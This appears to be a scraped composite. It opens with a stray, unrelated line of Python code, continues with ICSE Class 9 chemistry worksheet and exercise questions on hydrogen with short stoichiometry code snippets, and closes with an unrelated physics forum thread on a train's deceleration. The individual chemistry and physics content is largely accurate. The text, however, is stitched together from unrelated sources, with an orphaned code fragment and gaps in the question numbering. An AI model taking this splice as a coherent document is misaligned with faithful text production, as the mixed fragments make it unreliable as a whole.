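print(avg_fe, resolved)  # both equal 8/3
```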
Equation Worksheet | Q 1.08
Complete and balance the equation:
[General method]
Reactions of metals with dilute acids
Magnesium - Mg + 2HCl → ______+ _______ [g]
Equation Worksheet | Q 1.09
Complete and balance the equation:
[General method]
Reactions of metals with dilute acids
Aluminium - 2Al + 3H2SO4 → ______+ _______ [g]
Equation Worksheet | Q 1.10
Complete and balance the equation:
[General method]
Reactions of metals with dilute acids
Zinc - Zn + 2HCl → ______ + _______ [g]
Equation Worksheet | Q 1.11
Complete and balance the equation:
[General method]
Reactions of metals with dilute acids
Iron - Fe + 2HCl → ______ + _______ [g]
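In these reactions of metals with dilute acids the mole ratio fixes the hydrogen yield: in Zn + 2HCl → ZnCl2 + H2, one mole of zinc liberates one mole of hydrogen, so the gas volume follows directly from the mass of metal. A worked sketch; the atomic mass of Zn (about 65.4 g/mol) and the molar gas volume at STP (22.4 L/mol) are the assumed constants:

```python
# STP volume of H2 liberated by a given mass of zinc.
# Zn + 2HCl -> ZnCl2 + H2 : 1 mol Zn -> 1 mol H2.
M_ZN = 65.4      # g/mol, approximate atomic mass of zinc
V_MOLAR = 22.4   # L/mol at STP

def h2_volume_from_zinc(grams_zn):
    moles_zn = grams_zn / M_ZN
    return moles_zn * V_MOLAR   # 1:1 mole ratio carries moles of Zn to moles of H2

print(round(h2_volume_from_zinc(6.54), 2))  # 6.54 g of Zn -> 2.24 L of H2
```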
Equation Worksheet | Q 1.12
Complete and balance the equation:
[General method]
Reactions of metals - alkali [conc. soln.]
Zinc - Zn + 2NaOH → ______ + _______ [g]
Zn + 2KOH → ____ + _____ [g]
Equation Worksheet | Q 1.13
Complete and balance the equation:
[General method]
Reactions of metals - alkali [conc. soln.]
Lead - Pb + 2NaOH → ______ + _______ [g]
Equation Worksheet | Q 1.14
Complete and balance the equation:
[General method]
Reactions of metals - alkali [conc. soln.]
Aluminium - 2Al + 2NaOH + 2H2O → ______ + _______ [g]
2Al + 2KOH + 2H2O → _____ + _____ [g]
Equation Worksheet | Q 1.15
Complete and balance the equation:
[Laboratory method]
By action of dilute acid on zinc
Zinc - Zn + 2HCl → _____ + _____ [g]
Equation Worksheet | Q 1.16
Complete and balance the equation:
[Industrial Method - Bosch process]
• Step I - Production of water gas -
$\ce{C + H2O->[1000°C]}$ [____ + ____] - Δ
• Step II - Reduction of steam to hydrogen by carbon monoxide
$\ce{CO + H2 + H2O->[450°C][Fe2O3]}$ _____ + ____ [g]
• Step III - Removal of unreacted carbon dioxide and carbon monoxide from the above mixture
KOH + CO2 → _________ + ______
CuCl + CO + 2H2O → _______
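A point worth noticing once the blanks are filled with the standard textbook completions: each mole of carbon fed into the Bosch process ultimately yields two moles of hydrogen, one in the water-gas step (C + H2O → CO + H2) and a second when the CO reduces more steam over heated Fe2O3 (CO + H2O → CO2 + H2). A tally of that yield (illustrative sketch):

```python
# Hydrogen yield per mole of carbon through the Bosch process.
# Step I:  C  + H2O -> CO  + H2   (1 mol H2 per mol C)
# Step II: CO + H2O -> CO2 + H2   (1 more mol H2 per mol CO, i.e. per mol C)
def h2_moles(moles_carbon):
    step1 = moles_carbon   # H2 produced with the water gas
    step2 = moles_carbon   # H2 produced when the CO is shifted with more steam
    return step1 + step2

print(h2_moles(1))  # 2 mol of H2 per mol of coke carbon
```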
Equation Worksheet | Q 1.19
Complete and balance the equation:
Conversion of hydrogen to -
Water - 2H2 + O2 → ________
Equation Worksheet | Q 1.20
Complete and balance the equation:
Conversion of hydrogen to -
Hydrogen chloride - H2 + Cl2 → ________
Equation Worksheet | Q 1.21
Complete and balance the equation:
Conversion of hydrogen to -
Ammonia - N2 + 3H2 ⇌ ________
Equation Worksheet | Q 1.22
Complete and balance the equation:
Conversion of hydrogen to -
Hydrogen sulphide - H2 + S → ________
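In the ammonia conversion, N2 + 3H2 ⇌ 2NH3, the mole ratio caps the yield: three volumes of hydrogen combine with one of nitrogen to give at most two of ammonia. A sketch of the limiting-reagent arithmetic (ignoring the equilibrium position, which in practice reduces the yield further):

```python
# Stoichiometric ceiling on NH3 from given moles of N2 and H2 (N2 + 3H2 -> 2NH3).
def max_ammonia(n2, h2):
    extent = min(n2, h2 / 3)   # reaction extent limited by the scarcer reagent
    return 2 * extent

print(max_ammonia(1, 3))    # 2.0
print(max_ammonia(1, 1.5))  # 1.0 (hydrogen limiting)
```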
Equation Worksheet | Q 1.23
Complete and balance the equation:
Hydrogen in metallurgy - reduction of
Zinc oxide - ZnO + H2 → ________ + ______
Equation Worksheet | Q 1.24
Complete and balance the equation:
Hydrogen in metallurgy - reduction of
Iron [III] oxide - Fe2O3 + 3H2 → ________ + ______
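For the iron [III] oxide reduction above, Fe2O3 + 3H2 → 2Fe + 3H2O, three moles of hydrogen are consumed per mole of oxide. A worked sketch of the mass relationship; the molar masses used (Fe about 55.8, O = 16, H = 1) are rounded assumptions:

```python
# Mass of hydrogen required to reduce a given mass of iron(III) oxide.
# Fe2O3 + 3H2 -> 2Fe + 3H2O : 3 mol H2 per mol Fe2O3.
M_FE2O3 = 2 * 55.8 + 3 * 16.0   # about 159.6 g/mol
M_H2 = 2 * 1.0                  # 2 g/mol

def h2_mass_needed(grams_fe2o3):
    moles_oxide = grams_fe2o3 / M_FE2O3
    return 3 * moles_oxide * M_H2

print(round(h2_mass_needed(159.6), 2))  # 1 mol of oxide needs 6 g of H2
```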
Exercise
### Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry Chapter 6 Study Of The First Element — Hydrogen: Exercise
Exercise | Q 1.1
Name an element which reacts violently with water at room temperature.
Exercise | Q 1.2
What do the following symbols [or formula] denote : 2H ; H2 ; H+. [two atoms, molecule, ion]
Exercise | Q 1.3
Write a correctly balanced equation for the following “word equation”:
calcium + water → calcium hydroxide + hydrogen
Exercise | Q 1.4
When steam is passed over red-hot iron, magnetic oxide of iron and hydrogen are obtained. “The reaction between steam and red-hot iron is a Reversible Reaction.” What is meant by this statement.
Exercise | Q 1.5
How can you obtain hydrogen from sodium hydroxide [not by electrolysis].
Exercise | Q 2
Write balanced equation for the following reaction:
magnesium + dil. hydrochloric acid → ___
Exercise | Q 3.1
Name a gas which burns in air or oxygen forming water.
Exercise | Q 3.2
Write correctly balanced equation for the following:
When steam is passed over red hot iron.
Exercise | Q 3.3
Explain the following:
Two jars of H2 are collected – “one burns quietly and the other does not”.
Exercise | Q 4.1
Write correctly the balanced equation for the following:
‘When zinc filings are added to a concentrated solution of sodium hydroxide’.
Exercise | Q 4.2
Describe one chemical test applied to the following gases, which would enable you to distinguish between them :‘carbon monoxide and hydrogen’.
Exercise | Q 5.1
Write down the “word equation” for the following reaction:
sodium hydroxide solution + zinc → ?
Exercise | Q 5.2
Explain briefly how hydrogen is manufactured on a large scale, from steam.
Exercise | Q 6
State the products of the reaction “when steam is passed over red-hot iron”.
Exercise | Q 7.1
How can you obtain hydrogen from a mixture of hydrogen and carbon monoxide?
Exercise | Q 7.2
What do you observe when a piece of sodium is dropped into cold water?
Exercise | Q 7.3
Give reason for the following:
Though hydrogen is lighter than air, it cannot be collected by downward displacement of air.
Exercise | Q 7.4
Complete the following word equation:
Sodium hydroxide + zinc → hydrogen + _________
Exercise | Q 7.4
Complete the following word equation:
Calcium + water → calcium hydroxide + _________
Exercise | Q 8
How would you obtain ‘hydrogen from sodium hydroxide’ solution other than by electrolysis?
Exercise | Q 9.1
Complete and balance the following equations:
Al + NaOH + ____ → ____ + ____
Exercise | Q 9.2
What do the following symbols represent : 2H and H2.
Exercise | Q 10.1
Write balanced equation of the reaction in the preparation of : hydrogen from a solution of potassium hydroxide [other than by electrolysis].
Exercise | Q 10.2
Describe briefly, with equations, the Bosch Process for the large scale production of hydrogen.
Exercise | Q 10.3
Account for the following fact:
Though lead is above hydrogen in the activity series, it does not react with dilute hydrochloric acid or dilute sulphuric acid.
Exercise | Q 10.3
Account for the following fact:
Potassium and sodium are not used to react with dilute hydrochloric acid or dilute sulphuric acid in the laboratory preparation of hydrogen.
Exercise | Q 11.1
Place the metals calcium, iron, magnesium and sodium in order of their activity with water, placing the most active first. Write the equation for each of the above metals which react with water.
Exercise | Q 11.2
Why is copper not used to prepare hydrogen by the action of dilute hydrochloric acid or dilute sulphuric acid on the metal? [copper [Cu] is below hydrogen – no reaction]
### Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry Chapter 6 Study Of The First Element — Hydrogen: Additional Questions
State the electronic configuration of hydrogen [at. no. 1].
Give a reason why hydrogen can be placed in group 1 [IA] and group 17 [VIIA] of the periodic table.
Give the general group characteristic applied to hydrogen with respect to similarity in properties of hydrogen with alkali metals of group 1 [IA]. With special reference to valency electrons & ion formation.
Give the general group characteristic applied to hydrogen with respect to similarity in properties of hydrogen with halogens of group 17 [VIIA]. With special reference to valency electrons & ion formation.
How did the name ‘hydrogen’ originate. How does hydrogen occur in the combined state.
Give balanced equation for obtaining hydrogen from cold water using a monovalent active metal.
Give balanced equation for obtaining hydrogen from cold water using a divalent active metal.
Give a balanced equation for obtaining hydrogen from:
Boiling water using a divalent metal.
Give a balanced equation for obtaining hydrogen from:
Steam using a trivalent metal.
Give a balanced equation for obtaining hydrogen from:
Steam using a metal – and the reaction is reversible.
State why hydrogen is not prepared in the laboratory by the action of sodium with cold water.
State why hydrogen is not prepared in the laboratory by the action of calcium with dilute sulphuric acid.
State why hydrogen is not prepared in the laboratory by the action of lead with dilute hydrochloric acid.
Give a balanced equation for the following conversion:
Zinc to sodium zincate – using an alkali.
Give a balanced equation for the following conversion: sodium plumbite from lead.
Give a balanced equation for the following conversion: sodium aluminate from aluminium.
In the laboratory preparation of hydrogen from zinc and dilute acid, give a reason for the following:
The complete apparatus is air-tight.
In the laboratory preparation of hydrogen from zinc and dilute acid, give a reason for the following:
Dilute nitric acid is not preferred as the reactant acid.
In the laboratory preparation of hydrogen from zinc and dilute acid, give a reason for the following:
The lower end of the thistle funnel should dip below the level of the acid in the flask.
In the laboratory preparation of hydrogen from zinc and dilute acid, give a reason for the following:
Hydrogen is not collected over air.
‘Magnesium reacts with very dilute nitric acid at low temperatures liberating hydrogen.’ Give reasons.
State the condition and give balanced equation for the conversion of coke to water gas.
State the condition and give balanced equation for the conversion of water gas to hydrogen – in the Bosch process.
How are the unreacted gases separated out in the Bosch process in the manufacture of hydrogen?
Give a test to differentiate between two gas jars – one containing pure hydrogen and the other hydrogen-air mixture.
State the reactant added to hydrogen to obtain the respective product in following case.
Ammonia
State the reactant added to hydrogen to obtain the respective product in following case.
Hydrogen chloride
State the reactant added to hydrogen to obtain the respective product in following case.
Water
State the reactant added to hydrogen to obtain the respective product in following case.
Hydrogen sulphide
Discuss the use of hydrogen as a fuel.
State the use of hydrogen –
In hydrogenation of oil and coal
State the use of hydrogen –
In the extraction of metals
Explain the term oxidation in terms of addition and removal of oxygen/hydrogen, with a suitable example.
Explain the term reduction in terms of addition and removal of oxygen/hydrogen, with a suitable example.
Explain the term redox reaction with an example involving the reaction of hydrogen sulphide with chlorine.
State what an oxidising agent is. Give an example of an oxidising agent in gaseous, liquid, and solid form.
State what a reducing agent is. Give an example of a reducing agent in gaseous, liquid, and solid form.
Give two tests for an oxidising agent.
Give two tests for a reducing agent.
### Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry Chapter 6 Study Of The First Element — Hydrogen: Hydrogen
Hydrogen | Q 1.1
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{Ca(OH)2 + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 1.2
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{MgO + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 1.3
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{Fe3O4 + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 1.4
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{Al2(SO4)3 + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 1.5
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{NaAlO2 + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 2.1
Give a balanced equation for the following conversion.
$\ce{MgCl2<-HCl->FeCl2}$
Hydrogen | Q 2.2
Give a balanced equation for the following conversion.
$\ce{KAlO2<-KOH->K2ZnO2}$
Hydrogen | Q 2.3
Give a balanced equation for the following conversion.
$\ce{ZnO<-H2O->Fe3O4}$
Hydrogen | Q 2.4
Give a balanced equation for the following conversion.
$\ce{CO + H2<-H2O->CO2 + H2}$
Hydrogen | Q 2.5
Give a balanced equation for the following conversion.
$\ce{NH3<-H2->H2S}$
Hydrogen | Q 3.1
Give a reason for the following.
Nitric acid in the dilute form is not used in the laboratory preparation of hydrogen from metals.
Hydrogen | Q 3.2
Give a reason for the following.
Granulated zinc is preferred to metallic zinc in the preparation of hydrogen using dilute acid.
Hydrogen | Q 3.3
Give a reason for the following.
Hydrogen and alkali metals of group 1 [IA] react with copper [II] oxide to give copper.
Hydrogen | Q 3.4
Give a reason for the following.
Hydrogen is collected by the downward displacement of water and not of air, even though it is lighter than air.
Hydrogen | Q 3.5
Give a reason for the following.
A mixture of hydrogen and chlorine can be separated by passage through a porous pot.
Hydrogen | Q 4.1
Name the following.
A metal below iron but above copper in the activity series of metals which has no reaction with water.
Hydrogen | Q 4.2
Name the following.
A metal which cannot be used for the preparation of hydrogen using dilute acids.
Hydrogen | Q 4.3
Name the following.
The salt formed when aluminium reacts with potassium hydroxide, during the preparation of hydrogen from alkalis.
Hydrogen | Q 4.4
Name the following.
A gaseous reducing agent which is basic in nature.
Hydrogen | Q 4.5
Name the following.
A compound formed between hydrogen and an element from group 17 [VIIA] – period 3.
Hydrogen | Q 5.1
Select the correct answer from the symbol in the bracket.
The element placed below hydrogen in group 1 [IA].
• Na
• Li
• K
• F
Hydrogen | Q 5.2
Select the correct answer from the symbol in the bracket.
The element other than hydrogen, which forms a molecule containing a single covalent bond.
• Cl
• N
• O
Hydrogen | Q 5.3
Select the correct answer from the symbol in the bracket.
The element, which like hydrogen has one valence electron.
• He
• Na
• F
• O
Hydrogen | Q 5.4
Select the correct answer from the symbol in the bracket.
The element, which like hydrogen is a strong reducing agent.
• Pb
• Na
• S
• Cl
Hydrogen | Q 5.5
Select the correct answer from the symbol in the bracket.
The element which forms a diatomic molecule.
• C
• Br
• S
• P
Hydrogen | Q 6.1
The diagram represents the preparation and collection of hydrogen by a standard laboratory method.
State what is added through the thistle funnel 'Y'.
Hydrogen | Q 6.2
The diagram represents the preparation and collection of hydrogen by a standard laboratory method.
State what difference will be seen if pure zinc is added to the distillation flask 'X' instead of granulated zinc.
Hydrogen | Q 6.3
The diagram represents the preparation and collection of hydrogen by a standard laboratory method.
Name a solution which absorbs the impurity $\ce{H2S}$.
Hydrogen | Q 6.4
The diagram represents the preparation and collection of hydrogen by a standard laboratory method.
State why hydrogen is collected only after all the air in the apparatus is allowed to escape.
Hydrogen | Q 6.5
The diagram represents the preparation and collection of hydrogen by a standard laboratory method.
Name a gas other than hydrogen collected by the same method.
## Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry chapter 6 - Study Of The First Element — Hydrogen
Concepts covered in Class 9 Simplified ICSE Chemistry chapter 6 Study Of The First Element — Hydrogen are Position of the Non-metal (Hydrogen) in the Periodic Table, Hydrogen from Alkalies, Laboratory Preparation of Hydrogen, Hydrogen from Water, Hydrogen from Dilute Acids, Application of Activity Series in the Preparation of Hydrogen, Similarities Between Hydrogen and Halogens, Preparation of Hydrogen, Concept of Hydrogen, Properties and Uses of Hydrogen, Hydrogen - Oxidation and Reduction, Manufacture of Hydrogen, Preparation of Hydrogen from Water – Electrolysis, Preference of Zinc as the Metal to Be Used (With Reasons).
# Acceleration. Linear motion. I'm stuck
#### Run Haridan
1. Homework Statement
A train moves at a velocity of 60 m s-1 and stops after a distance of 600 m. What is its deceleration?
2. Homework Equations
v=s/t
3. The Attempt at a Solution
this is my working:
u= 0 m s-1
v= 60 m s-1
s= 600 m
v=s/t
60=600/t
t=10 s
#### rl.bhat
Homework Helper
Re: acceleration. linear motion. i'm stuck!!!
The velocity is not uniform, so you can't use v = s/t. And here the initial velocity is 60 m/s and the final velocity is 0. Use the appropriate kinematic formula which relates initial velocity, final velocity, acceleration and displacement.
#### Run Haridan
Re: acceleration. linear motion. i'm stuck!!!
What formula? Tell me and I'll try to work it out!
#### rl.bhat
Homework Helper
Re: acceleration. linear motion. i'm stuck!!!
v^2 - u^2 = 2as
#### harvellt
Re: acceleration. linear motion. i'm stuck!!!
My favorite for finding acceleration is $a \, \Delta x = \frac{1}{2} \Delta(v^2)$
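The two formulas above give the same answer for the train problem. A quick numerical check (an illustrative sketch, not part of the original thread) applies v² − u² = 2as with u = 60 m/s, v = 0, s = 600 m:

```python
# Solve the thread's problem: a train decelerates from u = 60 m/s
# to rest (v = 0) over s = 600 m. From v^2 - u^2 = 2*a*s:
u = 60.0   # initial velocity, m/s
v = 0.0    # final velocity, m/s
s = 600.0  # stopping distance, m

a = (v**2 - u**2) / (2 * s)  # acceleration, m/s^2
print(a)  # -3.0, i.e. a deceleration of 3 m/s^2

# The student's v = s/t holds only for uniform velocity; here the
# velocity changes, so the 10 s found that way is not the stopping
# time. The actual stopping time follows from v = u + a*t:
t = (v - u) / a
print(t)  # 20.0 seconds
```

Note that the average velocity during braking is 30 m/s, which over 600 m indeed gives 20 s, consistent with the kinematic result.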